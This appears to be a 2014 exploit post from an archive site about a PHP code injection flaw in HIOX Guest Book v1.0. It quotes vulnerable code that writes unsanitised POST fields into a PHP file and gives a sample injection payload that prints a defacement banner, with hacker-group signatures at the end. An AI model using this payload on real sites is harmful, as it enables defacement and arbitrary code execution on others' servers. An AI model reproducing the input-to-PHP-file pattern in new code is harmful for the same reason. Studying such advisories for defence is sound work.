HIOX GUEST BOOK DB based utility V1.0 PHP Injection Vulnerability

2014-01-05 17:09:35
Inviato da: JoKeR_StEx

#############################################################################

# Exploit Title : HIOX GUEST BOOK DB based utility V1.0 PHP Injection Vulnerability

# Author : JoKeR_StEx

# Tested On : Windows

# Download Software Link : www.hscripts.com/scripts/php/downloads/HGB.zip

# Date : 04/01/2014

#############################################################################

[+] About Script
Release Date - 02-04-2011
Version : HGB DB based unility v1.0

Bug IN file : Url.php

[+] Vulnerable Code :

<?
$iswrite = $_POST['what'];

if($iswrite == "write")
{
$bx = $_POST['Box'];

$bd = $_POST['Body'];
$fc = $_POST['Font'];
$omc = $_POST['Odd'];
$emc = $_POST['Even'];
$htmle = $_POST['var'];
$file = fopen('col.php',w);

fwrite($file,"<?php\n\n");
fwrite($file,"$"."bxcolor = \"$bx\";\n");
fwrite($file,"$"."bdcolor = \"$bd\";\n");
fwrite($file,"$"."fontcol = \"$fc\";\n");
fwrite($file,"$"."oddmess = \"$omc\";\n");
fwrite($file,"$"."evenmess = \"$emc\";\n");
fwrite($file,"$"."html_enable = \"$htmle\";\n\n");
?>

[+] For Inject Code lik("'dz'".print".<h1>Hakced By JoKerR_StEx</h1>") You can use some tools(en têtes http en direct)

################################################################################
# The Black Devils
# Dz Crazy L33ts
################################################################################
email : [email protected]
Facebook : fb.me/imadlilong.lasvegas
twitter : @JoKeR_StEx

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.